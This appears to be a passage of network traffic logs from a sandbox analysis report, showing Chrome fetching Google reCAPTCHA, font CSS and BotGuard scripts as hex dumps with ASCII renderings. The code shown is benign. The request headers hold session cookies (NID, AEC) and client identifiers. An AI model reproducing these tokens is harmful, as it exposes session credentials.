2024-02-21 07:14:08 UTC	528	IN	HTTP/1.1 200 OK Content-Type: text/javascript; charset=utf-8 Expires: Wed, 21 Feb 2024 07:14:08 GMT Date: Wed, 21 Feb 2024 07:14:08 GMT Cache-Control: private, max-age=300 Cross-Origin-Resource-Policy: cross-origin X-Content-Type-Options: nosniff X-Frame-Options: SAMEORIGIN Content-Security-Policy: frame-ancestors 'self' X-XSS-Protection: 1; mode=block Server: GSE Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Accept-Ranges: none Vary: Accept-Encoding Connection: close Transfer-Encoding: chunked
2024-02-21 07:14:08 UTC	724	IN	Data Raw: 34 63 36 0d 0a 2f 2a 20 50 4c 45 41 53 45 20 44 4f 20 4e 4f 54 20 43 4f 50 59 20 41 4e 44 20 50 41 53 54 45 20 54 48 49 53 20 43 4f 44 45 2e 20 2a 2f 28 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 77 3d 77 69 6e 64 6f 77 2c 43 3d 27 5f 5f 5f 67 72 65 63 61 70 74 63 68 61 5f 63 66 67 27 2c 63 66 67 3d 77 5b 43 5d 3d 77 5b 43 5d 7c 7c 7b 7d 2c 4e 3d 27 67 72 65 63 61 70 74 63 68 61 27 3b 76 61 72 20 67 72 3d 77 5b 4e 5d 3d 77 5b 4e 5d 7c 7c 7b 7d 3b 67 72 2e 72 65 61 64 79 3d 67 72 2e 72 65 61 64 79 7c 7c 66 75 6e 63 74 69 6f 6e 28 66 29 7b 28 63 66 67 5b 27 66 6e 73 27 5d 3d 63 66 67 5b 27 66 6e 73 27 5d 7c 7c 5b 5d 29 2e 70 75 73 68 28 66 29 3b 7d 3b 77 5b 27 5f 5f 72 65 63 61 70 74 63 68 61 5f 61 70 69 27 5d 3d 27 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 Data Ascii: 4c6/* PLEASE DO NOT COPY AND PASTE THIS CODE. */(function(){var w=window,C='___grecaptcha_cfg',cfg=w[C]=w[C]\|\|{},N='grecaptcha';var gr=w[N]=w[N]\|\|{};gr.ready=gr.ready\|\|function(f){(cfg['fns']=cfg['fns']\|\|[]).push(f);};w['__recaptcha_api']='https://www.g
2024-02-21 07:14:08 UTC	505	IN	Data Raw: 6d 56 34 63 47 6c 79 65 53 49 36 4d 54 63 79 4e 54 51 77 4e 7a 6b 35 4f 53 77 69 61 58 4e 54 64 57 4a 6b 62 32 31 68 61 57 34 69 4f 6e 52 79 64 57 55 73 49 6d 6c 7a 56 47 68 70 63 6d 52 51 59 58 4a 30 65 53 49 36 64 48 4a 31 5a 58 30 3d 27 3b 64 2e 68 65 61 64 2e 70 72 65 70 65 6e 64 28 6d 29 3b 70 6f 2e 73 72 63 3d 27 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 73 74 61 74 69 63 2e 63 6f 6d 2f 72 65 63 61 70 74 63 68 61 2f 72 65 6c 65 61 73 65 73 2f 79 69 4e 57 33 52 39 6a 6b 79 4c 56 50 35 2d 45 45 5a 4c 44 7a 55 74 41 2f 72 65 63 61 70 74 63 68 61 5f 5f 65 6e 2e 6a 73 27 3b 70 6f 2e 63 72 6f 73 73 4f 72 69 67 69 6e 3d 27 61 6e 6f 6e 79 6d 6f 75 73 27 3b 70 6f 2e 69 6e 74 65 67 72 69 74 79 3d 27 73 68 61 33 38 34 2d 37 2b 49 52 4c 78 6b 6c 31 7a 36 71 72 2f Data Ascii: mV4cGlyeSI6MTcyNTQwNzk5OSwiaXNTdWJkb21haW4iOnRydWUsImlzVGhpcmRQYXJ0eSI6dHJ1ZX0=';d.head.prepend(m);po.src='https://www.gstatic.com/recaptcha/releases/yiNW3R9jkyLVP5-EEZLDzUtA/recaptcha__en.js';po.crossOrigin='anonymous';po.integrity='sha384-7+IRLxkl1z6qr/
2024-02-21 07:14:08 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.5	49720	142.250.65.228	443	7220	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-02-21 07:14:09 UTC	1730	OUT	GET /recaptcha/api2/anchor?ar=1&k=6LfwuyUTAAAAAOAmoS0fdqijC2PbbdH4kjq62Y1b&co=aHR0cHM6Ly93d3cuZ29vZ2xlLmNvbTo0NDM.&hl=en&v=yiNW3R9jkyLVP5-EEZLDzUtA&size=normal&s=xz3LsDhnVKWNDPAxYsfSai-65gQfUWB55L8TFubhcQqJlrltbCH3uiMgqw9QAslta7P_yQ2bZH1ORXgoYVB-hTK_zEC7bXvNca4AZA-u_gcND1aHqzQAuQdE8YR_32tCw2qLxz-xd4-Z3Nm9D50Nbwkns7louT2dRkQLmWk-2Dn-QozQIbnlAs_c6yUIm5PKVMMSXO7KlIPqv21jVxvuhA6gVzHJJcirmiwhSjBz4o70vFTT38JJB0MyLvqVTg1YM6Qx6WiknHHxvIM6RlgthjUDYRm3_PM&cb=px5dhzo8o1yu HTTP/1.1 Host: www.google.com Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "Windows" Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIk6HLAQiFoM0BCNy9zQEI2sPNAQjpxc0BCLnKzQEIv9HNAQiK080BCNDWzQEIqNjNAQj5wNQVGI/OzQEYutLNARjC2M0BGOuNpRc= Sec-Fetch-Site: same-origin Sec-Fetch-Mode: navigate Sec-Fetch-Dest: iframe Referer: https://www.google.com/sorry/index?continue=https://www.google.com/&q=EgS_YOPeGL7F1q4GIjBwAWbomQLbaJKyWdrTAZ9MKsU5Vq2-V7iqyHfa4-ZPY5fgDT5PQDrRGB3-eVas0UEyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Cookie: NID=511=Ef5vPFGw-MZYo5hwe-0ThAVslbxbmvdVZwcHnqVzWHAU14v53MN1VvwvQq8baYfg2-IAtqZBV5NOL5rvj2NWIqrz377UhLdHtOgE-tJaBlUBYJEhuGsQdqni3oTJg0brqv1djdiLJyvTSUhdK-c5JWadCSsULPLzhSx-F-6wOg4; 1P_JAR=2024-02-21-07; AEC=Ae3NU9MBixZLIde_1N07qJj3s37lv5ooCeQDtC9mj3Hmwo7WGjwK0pzd8w
2024-02-21 07:14:09 UTC	891	IN	HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Cross-Origin-Resource-Policy: cross-origin Cross-Origin-Embedder-Policy: require-corp Report-To: {"group":"recaptcha","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/recaptcha"}]} Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Wed, 21 Feb 2024 07:14:09 GMT Content-Security-Policy: script-src 'report-sample' 'nonce-JydsAVeFWYBeKXtw5mYR8g' 'unsafe-inline' 'strict-dynamic' https: http: 'unsafe-eval';object-src 'none';base-uri 'self';report-uri https://csp.withgoogle.com/csp/recaptcha/1 X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block Server: GSE Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Accept-Ranges: none Vary: Accept-Encoding Connection: close Transfer-Encoding: chunked
2024-02-21 07:14:09 UTC	361	IN	Data Raw: 32 61 62 66 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 3c 68 74 6d 6c 20 64 69 72 3d 22 6c 74 72 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0a 3c 74 69 74 6c 65 3e 72 65 43 41 50 54 43 48 41 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 2f 2a 20 63 79 72 69 6c 6c 69 63 2d 65 78 74 20 2a 2f 0a 40 66 6f 6e 74 2d 66 61 63 65 20 7b Data Ascii: 2abf<!DOCTYPE HTML><html dir="ltr" lang="en"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><title>reCAPTCHA</title><style type="text/css">/* cyrillic-ext */@font-face {
2024-02-21 07:14:09 UTC	1252	IN	Data Raw: 6f 2f 76 31 38 2f 4b 46 4f 6d 43 6e 71 45 75 39 32 46 72 31 4d 75 37 32 78 4b 4f 7a 59 2e 77 6f 66 66 32 29 20 66 6f 72 6d 61 74 28 27 77 6f 66 66 32 27 29 3b 0a 20 20 75 6e 69 63 6f 64 65 2d 72 61 6e 67 65 3a 20 55 2b 30 34 36 30 2d 30 35 32 46 2c 20 55 2b 31 43 38 30 2d 31 43 38 38 2c 20 55 2b 32 30 42 34 2c 20 55 2b 32 44 45 30 2d 32 44 46 46 2c 20 55 2b 41 36 34 30 2d 41 36 39 46 2c 20 55 2b 46 45 32 45 2d 46 45 32 46 3b 0a 7d 0a 2f 2a 20 63 79 72 69 6c 6c 69 63 20 2a 2f 0a 40 66 6f 6e 74 2d 66 61 63 65 20 7b 0a 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 27 52 6f 62 6f 74 6f 27 3b 0a 20 20 66 6f 6e 74 2d 73 74 79 6c 65 3a 20 6e 6f 72 6d 61 6c 3b 0a 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 34 30 30 3b 0a 20 20 73 72 63 3a 20 75 72 6c 28 2f 2f 66 Data Ascii: o/v18/KFOmCnqEu92Fr1Mu72xKOzY.woff2) format('woff2'); unicode-range: U+0460-052F, U+1C80-1C88, U+20B4, U+2DE0-2DFF, U+A640-A69F, U+FE2E-FE2F;}/* cyrillic */@font-face { font-family: 'Roboto'; font-style: normal; font-weight: 400; src: url(//f
2024-02-21 07:14:09 UTC	1252	IN	Data Raw: 39 2c 20 55 2b 32 30 41 42 3b 0a 7d 0a 2f 2a 20 6c 61 74 69 6e 2d 65 78 74 20 2a 2f 0a 40 66 6f 6e 74 2d 66 61 63 65 20 7b 0a 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 27 52 6f 62 6f 74 6f 27 3b 0a 20 20 66 6f 6e 74 2d 73 74 79 6c 65 3a 20 6e 6f 72 6d 61 6c 3b 0a 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 34 30 30 3b 0a 20 20 73 72 63 3a 20 75 72 6c 28 2f 2f 66 6f 6e 74 73 2e 67 73 74 61 74 69 63 2e 63 6f 6d 2f 73 2f 72 6f 62 6f 74 6f 2f 76 31 38 2f 4b 46 4f 6d 43 6e 71 45 75 39 32 46 72 31 4d 75 37 47 78 4b 4f 7a 59 2e 77 6f 66 66 32 29 20 66 6f 72 6d 61 74 28 27 77 6f 66 66 32 27 29 3b 0a 20 20 75 6e 69 63 6f 64 65 2d 72 61 6e 67 65 3a 20 55 2b 30 31 30 30 2d 30 32 41 46 2c 20 55 2b 30 33 30 34 2c 20 55 2b 30 33 30 38 2c 20 55 2b 30 33 32 39 2c 20 Data Ascii: 9, U+20AB;}/* latin-ext */@font-face { font-family: 'Roboto'; font-style: normal; font-weight: 400; src: url(//fonts.gstatic.com/s/roboto/v18/KFOmCnqEu92Fr1Mu7GxKOzY.woff2) format('woff2'); unicode-range: U+0100-02AF, U+0304, U+0308, U+0329,
2024-02-21 07:14:09 UTC	1252	IN	Data Raw: 30 2d 30 34 39 31 2c 20 55 2b 30 34 42 30 2d 30 34 42 31 2c 20 55 2b 32 31 31 36 3b 0a 7d 0a 2f 2a 20 67 72 65 65 6b 2d 65 78 74 20 2a 2f 0a 40 66 6f 6e 74 2d 66 61 63 65 20 7b 0a 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 27 52 6f 62 6f 74 6f 27 3b 0a 20 20 66 6f 6e 74 2d 73 74 79 6c 65 3a 20 6e 6f 72 6d 61 6c 3b 0a 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 35 30 30 3b 0a 20 20 73 72 63 3a 20 75 72 6c 28 2f 2f 66 6f 6e 74 73 2e 67 73 74 61 74 69 63 2e 63 6f 6d 2f 73 2f 72 6f 62 6f 74 6f 2f 76 31 38 2f 4b 46 4f 6c 43 6e 71 45 75 39 32 46 72 31 4d 6d 45 55 39 66 43 42 63 34 45 73 41 2e 77 6f 66 66 32 29 20 66 6f 72 6d 61 74 28 27 77 6f 66 66 32 27 29 3b 0a 20 20 75 6e 69 63 6f 64 65 2d 72 61 6e 67 65 3a 20 55 2b 31 46 30 30 2d 31 46 46 46 3b 0a 7d 0a Data Ascii: 0-0491, U+04B0-04B1, U+2116;}/* greek-ext */@font-face { font-family: 'Roboto'; font-style: normal; font-weight: 500; src: url(//fonts.gstatic.com/s/roboto/v18/KFOlCnqEu92Fr1MmEU9fCBc4EsA.woff2) format('woff2'); unicode-range: U+1F00-1FFF;}
2024-02-21 07:14:09 UTC	1252	IN	Data Raw: 2a 2f 0a 40 66 6f 6e 74 2d 66 61 63 65 20 7b 0a 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 27 52 6f 62 6f 74 6f 27 3b 0a 20 20 66 6f 6e 74 2d 73 74 79 6c 65 3a 20 6e 6f 72 6d 61 6c 3b 0a 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 35 30 30 3b 0a 20 20 73 72 63 3a 20 75 72 6c 28 2f 2f 66 6f 6e 74 73 2e 67 73 74 61 74 69 63 2e 63 6f 6d 2f 73 2f 72 6f 62 6f 74 6f 2f 76 31 38 2f 4b 46 4f 6c 43 6e 71 45 75 39 32 46 72 31 4d 6d 45 55 39 66 42 42 63 34 2e 77 6f 66 66 32 29 20 66 6f 72 6d 61 74 28 27 77 6f 66 66 32 27 29 3b 0a 20 20 75 6e 69 63 6f 64 65 2d 72 61 6e 67 65 3a 20 55 2b 30 30 30 30 2d 30 30 46 46 2c 20 55 2b 30 31 33 31 2c 20 55 2b 30 31 35 32 2d 30 31 35 33 2c 20 55 2b 30 32 42 42 2d 30 32 42 43 2c 20 55 2b 30 32 43 36 2c 20 55 2b 30 32 44 41 2c Data Ascii: */@font-face { font-family: 'Roboto'; font-style: normal; font-weight: 500; src: url(//fonts.gstatic.com/s/roboto/v18/KFOlCnqEu92Fr1MmEU9fBBc4.woff2) format('woff2'); unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA,
2024-02-21 07:14:09 UTC	1252	IN	Data Raw: 6c 28 2f 2f 66 6f 6e 74 73 2e 67 73 74 61 74 69 63 2e 63 6f 6d 2f 73 2f 72 6f 62 6f 74 6f 2f 76 31 38 2f 4b 46 4f 6c 43 6e 71 45 75 39 32 46 72 31 4d 6d 59 55 74 66 42 78 63 34 45 73 41 2e 77 6f 66 66 32 29 20 66 6f 72 6d 61 74 28 27 77 6f 66 66 32 27 29 3b 0a 20 20 75 6e 69 63 6f 64 65 2d 72 61 6e 67 65 3a 20 55 2b 30 33 37 30 2d 30 33 37 37 2c 20 55 2b 30 33 37 41 2d 30 33 37 46 2c 20 55 2b 30 33 38 34 2d 30 33 38 41 2c 20 55 2b 30 33 38 43 2c 20 55 2b 30 33 38 45 2d 30 33 41 31 2c 20 55 2b 30 33 41 33 2d 30 33 46 46 3b 0a 7d 0a 2f 2a 20 76 69 65 74 6e 61 6d 65 73 65 20 2a 2f 0a 40 66 6f 6e 74 2d 66 61 63 65 20 7b 0a 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 27 52 6f 62 6f 74 6f 27 3b 0a 20 20 66 6f 6e 74 2d 73 74 79 6c 65 3a 20 6e 6f 72 6d 61 6c 3b Data Ascii: l(//fonts.gstatic.com/s/roboto/v18/KFOlCnqEu92Fr1MmYUtfBxc4EsA.woff2) format('woff2'); unicode-range: U+0370-0377, U+037A-037F, U+0384-038A, U+038C, U+038E-03A1, U+03A3-03FF;}/* vietnamese */@font-face { font-family: 'Roboto'; font-style: normal;
2024-02-21 07:14:09 UTC	1252	IN	Data Raw: 20 55 2b 46 45 46 46 2c 20 55 2b 46 46 46 44 3b 0a 7d 0a 0a 3c 2f 73 74 79 6c 65 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 73 74 61 74 69 63 2e 63 6f 6d 2f 72 65 63 61 70 74 63 68 61 2f 72 65 6c 65 61 73 65 73 2f 79 69 4e 57 33 52 39 6a 6b 79 4c 56 50 35 2d 45 45 5a 4c 44 7a 55 74 41 2f 73 74 79 6c 65 73 5f 5f 6c 74 72 2e 63 73 73 22 3e 0a 3c 73 63 72 69 70 74 20 6e 6f 6e 63 65 3d 22 4a 79 64 73 41 56 65 46 57 59 42 65 4b 58 74 77 35 6d 59 52 38 67 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 77 69 6e 64 6f 77 5b 27 5f 5f 72 65 63 61 70 74 63 68 61 5f 61 70 69 27 5d 20 3d 20 27 68 74 74 70 Data Ascii: U+FEFF, U+FFFD;}</style><link rel="stylesheet" type="text/css" href="https://www.gstatic.com/recaptcha/releases/yiNW3R9jkyLVP5-EEZLDzUtA/styles__ltr.css"><script nonce="JydsAVeFWYBeKXtw5mYR8g" type="text/javascript">window['__recaptcha_api'] = 'http
2024-02-21 07:14:09 UTC	1252	IN	Data Raw: 52 65 54 42 45 4f 64 49 74 55 4c 5f 59 70 78 38 32 7a 39 41 54 61 57 30 59 62 71 53 73 68 34 64 6b 79 6f 4f 7a 41 77 39 49 79 69 66 52 73 51 78 37 6f 42 63 58 7a 6a 45 49 75 32 53 38 6f 57 63 35 65 34 6a 64 47 45 6b 5f 4b 41 33 73 50 53 72 2d 6a 68 31 63 43 76 37 34 5a 62 77 4e 49 34 43 51 52 49 35 47 4f 71 57 39 37 74 67 53 59 39 68 55 4e 30 44 32 46 39 54 4f 4c 76 32 69 4e 33 43 59 79 50 70 34 51 68 58 62 36 42 2d 31 37 64 7a 6e 63 62 5f 37 4d 43 72 37 65 56 45 61 4c 73 31 64 43 52 69 74 4e 35 2d 4b 6a 32 61 57 53 6c 46 4d 72 63 4d 6b 69 30 71 47 6c 2d 6c 72 6d 72 74 6c 59 61 76 42 4b 35 34 38 46 35 2d 55 37 6d 33 35 63 78 76 5f 32 69 4b 4b 6a 4e 31 72 65 6b 51 7a 34 36 41 7a 6e 4a 43 67 79 55 59 52 45 75 49 6b 42 37 2d 54 67 70 78 5a 47 51 6c 76 53 30 Data Ascii: ReTBEOdItUL_Ypx82z9ATaW0YbqSsh4dkyoOzAw9IyifRsQx7oBcXzjEIu2S8oWc5e4jdGEk_KA3sPSr-jh1cCv74ZbwNI4CQRI5GOqW97tgSY9hUN0D2F9TOLv2iN3CYyPp4QhXb6B-17dzncb_7MCr7eVEaLs1dCRitN5-Kj2aWSlFMrcMki0qGl-lrmrtlYavBK548F5-U7m35cxv_2iKKjN1rekQz46AznJCgyUYREuIkB7-TgpxZGQlvS0
2024-02-21 07:14:09 UTC	1252	IN	Data Raw: 59 55 66 4e 74 6e 4e 66 74 4f 6d 6a 73 69 36 66 38 31 76 62 44 77 53 6d 45 4c 37 4e 55 6b 76 69 69 63 65 39 48 63 5f 70 30 4f 52 49 4d 65 35 5f 6d 52 54 4c 6d 76 43 6b 4b 78 36 76 71 55 71 72 4e 74 6f 4c 55 5f 79 4f 58 78 48 7a 69 77 56 71 71 7a 79 42 6a 4d 6e 44 2d 6a 74 5f 39 62 79 4e 74 62 73 6a 33 6c 49 59 78 42 58 30 6a 35 41 33 70 6c 56 5a 43 46 56 56 53 62 32 55 31 6a 6d 49 46 37 37 73 79 4b 42 71 32 70 51 6b 44 6a 30 47 76 51 66 41 39 4b 63 4f 75 39 61 62 47 78 51 31 6e 6d 4b 51 50 69 57 75 74 46 7a 56 64 53 48 6a 76 66 64 6a 33 6b 31 71 4c 4c 47 68 63 33 6d 44 4a 54 47 6d 5a 58 70 44 67 6c 79 2d 68 53 37 37 4a 6f 54 58 70 6b 52 6f 68 50 4f 6c 4d 4d 52 33 53 4b 43 30 36 61 7a 5a 77 69 5f 71 50 56 67 22 3e 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d Data Ascii: YUfNtnNftOmjsi6f81vbDwSmEL7NUkviice9Hc_p0ORIMe5_mRTLmvCkKx6vqUqrNtoLU_yOXxHziwVqqzyBjMnD-jt_9byNtbsj3lIYxBX0j5A3plVZCFVVSb2U1jmIF77syKBq2pQkDj0GvQfA9KcOu9abGxQ1nmKQPiWutFzVdSHjvfdj3k1qLLGhc3mDJTGmZXpDgly-hS77JoTXpkRohPOlMMR3SKC06azZwi_qPVg"><script type=
2024-02-21 07:14:09 UTC	574	IN	Data Raw: 32 57 6d 6c 44 63 44 6c 5a 4e 6c 56 51 57 44 56 73 5a 33 56 68 65 54 67 76 61 6c 6f 30 51 6c 70 33 54 6d 52 6d 61 43 74 75 62 30 78 6b 57 55 68 35 4e 57 46 46 56 6d 63 72 64 57 6c 51 62 57 34 32 64 47 39 55 56 56 52 4b 55 55 77 72 63 6e 68 5a 53 31 4a 6c 54 58 67 33 64 47 55 32 56 6a 52 49 55 6e 68 42 52 57 67 76 54 6a 52 4f 51 30 64 61 53 44 5a 51 62 30 59 78 54 6b 64 6f 64 55 6c 33 62 44 67 35 4d 44 5a 33 64 47 6f 7a 52 55 64 36 55 6c 46 6a 53 7a 6b 31 5a 32 5a 5a 54 57 39 77 65 48 46 4c 4e 6d 78 47 61 31 68 36 56 6b 51 30 5a 33 51 79 64 48 64 34 4f 44 4a 44 51 7a 6c 4b 55 44 4e 77 54 6c 5a 6e 55 55 55 78 55 6d 4d 31 52 43 39 56 57 45 5a 79 55 58 46 77 59 31 70 78 57 6d 5a 79 4e 55 35 4f 54 6b 31 34 65 55 70 6c 54 32 64 4b 61 55 70 45 63 48 4a 71 63 7a Data Ascii: 2WmlDcDlZNlVQWDVsZ3VheTgvalo0Qlp3TmRmaCtub0xkWUh5NWFFVmcrdWlQbW42dG9UVVRKUUwrcnhZS1JlTXg3dGU2VjRIUnhBRWgvTjROQ0daSDZQb0YxTkdodUl3bDg5MDZ3dGozRUd6UlFjSzk1Z2ZZTW9weHFLNmxGa1h6VkQ0Z3QydHd4ODJDQzlKUDNwTlZnUUUxUmM1RC9VWEZyUXFwY1pxWmZyNU5OTk14eUplT2dKaUpEcHJqcz

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.5	49724	142.250.65.228	443	7220	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-02-21 07:14:10 UTC	1445	OUT	GET /js/bg/zyvIRxypJp9XsXP7bFrUBd8JY_zCSu2ya-bkldlMTk8.js HTTP/1.1 Host: www.google.com Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: / X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIk6HLAQiFoM0BCNy9zQEI2sPNAQjpxc0BCLnKzQEIv9HNAQiK080BCNDWzQEIqNjNAQj5wNQVGI/OzQEYutLNARjC2M0BGOuNpRc= Sec-Fetch-Site: same-origin Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: script Referer: https://www.google.com/recaptcha/api2/anchor?ar=1&k=6LfwuyUTAAAAAOAmoS0fdqijC2PbbdH4kjq62Y1b&co=aHR0cHM6Ly93d3cuZ29vZ2xlLmNvbTo0NDM.&hl=en&v=yiNW3R9jkyLVP5-EEZLDzUtA&size=normal&s=xz3LsDhnVKWNDPAxYsfSai-65gQfUWB55L8TFubhcQqJlrltbCH3uiMgqw9QAslta7P_yQ2bZH1ORXgoYVB-hTK_zEC7bXvNca4AZA-u_gcND1aHqzQAuQdE8YR_32tCw2qLxz-xd4-Z3Nm9D50Nbwkns7louT2dRkQLmWk-2Dn-QozQIbnlAs_c6yUIm5PKVMMSXO7KlIPqv21jVxvuhA6gVzHJJcirmiwhSjBz4o70vFTT38JJB0MyLvqVTg1YM6Qx6WiknHHxvIM6RlgthjUDYRm3_PM&cb=px5dhzo8o1yu Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Cookie: NID=511=Ef5vPFGw-MZYo5hwe-0ThAVslbxbmvdVZwcHnqVzWHAU14v53MN1VvwvQq8baYfg2-IAtqZBV5NOL5rvj2NWIqrz377UhLdHtOgE-tJaBlUBYJEhuGsQdqni3oTJg0brqv1djdiLJyvTSUhdK-c5JWadCSsULPLzhSx-F-6wOg4; 1P_JAR=2024-02-21-07; AEC=Ae3NU9MBixZLIde_1N07qJj3s37lv5ooCeQDtC9mj3Hmwo7WGjwK0pzd8w
2024-02-21 07:14:10 UTC	812	IN	HTTP/1.1 200 OK Accept-Ranges: bytes Content-Security-Policy-Report-Only: require-trusted-types-for 'script'; report-uri https://csp.withgoogle.com/csp/botguard-scs Cross-Origin-Resource-Policy: cross-origin Cross-Origin-Opener-Policy: same-origin; report-to="botguard-scs" Report-To: {"group":"botguard-scs","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/botguard-scs"}]} Content-Length: 17265 X-Content-Type-Options: nosniff Server: sffe X-XSS-Protection: 0 Date: Sun, 18 Feb 2024 03:56:51 GMT Expires: Mon, 17 Feb 2025 03:56:51 GMT Cache-Control: public, max-age=31536000 Last-Modified: Mon, 05 Feb 2024 17:30:00 GMT Content-Type: text/javascript Vary: Accept-Encoding Age: 271039 Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close
2024-02-21 07:14:10 UTC	440	IN	Data Raw: 2f 2a 20 41 6e 74 69 2d 73 70 61 6d 2e 20 57 61 6e 74 20 74 6f 20 73 61 79 20 68 65 6c 6c 6f 3f 20 43 6f 6e 74 61 63 74 20 28 62 61 73 65 36 34 29 20 59 6d 39 30 5a 33 56 68 63 6d 51 74 59 32 39 75 64 47 46 6a 64 45 42 6e 62 32 39 6e 62 47 55 75 59 32 39 74 20 2a 2f 20 28 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 42 3d 66 75 6e 63 74 69 6f 6e 28 64 29 7b 72 65 74 75 72 6e 20 64 7d 2c 58 3d 74 68 69 73 7c 7c 73 65 6c 66 2c 4a 3d 66 75 6e 63 74 69 6f 6e 28 64 2c 7a 29 7b 69 66 28 7a 3d 28 64 3d 58 2e 74 72 75 73 74 65 64 54 79 70 65 73 2c 6e 75 6c 6c 29 2c 21 64 7c 7c 21 64 2e 63 72 65 61 74 65 50 6f 6c 69 63 79 29 72 65 74 75 72 6e 20 7a 3b 74 72 79 7b 7a 3d 64 2e 63 72 65 61 74 65 50 6f 6c 69 63 79 28 22 62 67 22 2c 7b 63 72 65 61 74 65 48 54 4d 4c 3a Data Ascii: /* Anti-spam. Want to say hello? Contact (base64) Ym90Z3VhcmQtY29udGFjdEBnb29nbGUuY29t */ (function(){var B=function(d){return d},X=this\|\|self,J=function(d,z){if(z=(d=X.trustedTypes,null),!d\|\|!d.createPolicy)return z;try{z=d.createPolicy("bg",{createHTML:
2024-02-21 07:14:10 UTC	1252	IN	Data Raw: 63 72 65 61 74 65 53 63 72 69 70 74 28 49 29 7d 3a 66 75 6e 63 74 69 6f 6e 28 49 29 7b 72 65 74 75 72 6e 22 22 2b 49 7d 7d 28 58 29 28 41 72 72 61 79 28 37 38 32 34 2a 4d 61 74 68 2e 72 61 6e 64 6f 6d 28 29 7c 30 29 2e 6a 6f 69 6e 28 22 5c 6e 22 29 2b 27 28 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 7a 4e 3d 66 75 6e 63 74 69 6f 6e 28 64 2c 7a 2c 58 2c 49 2c 56 2c 61 29 7b 66 6f 72 28 56 3d 28 49 3d 28 58 3d 28 7a 3d 6d 28 28 61 3d 64 5b 64 61 5d 7c 7c 7b 7d 2c 64 29 29 2c 61 2e 77 6b 3d 6d 28 64 29 2c 61 2e 4e 3d 5b 5d 2c 64 2e 54 3d 3d 64 3f 28 62 28 64 29 7c 30 29 2d 31 3a 31 29 2c 6d 28 64 29 29 2c 30 29 3b 56 3c 58 3b 56 2b 2b 29 61 2e 4e 2e 70 75 73 68 28 6d 28 64 29 29 3b 66 6f 72 28 61 2e 4a 65 3d 66 28 64 2c 7a 29 2c 61 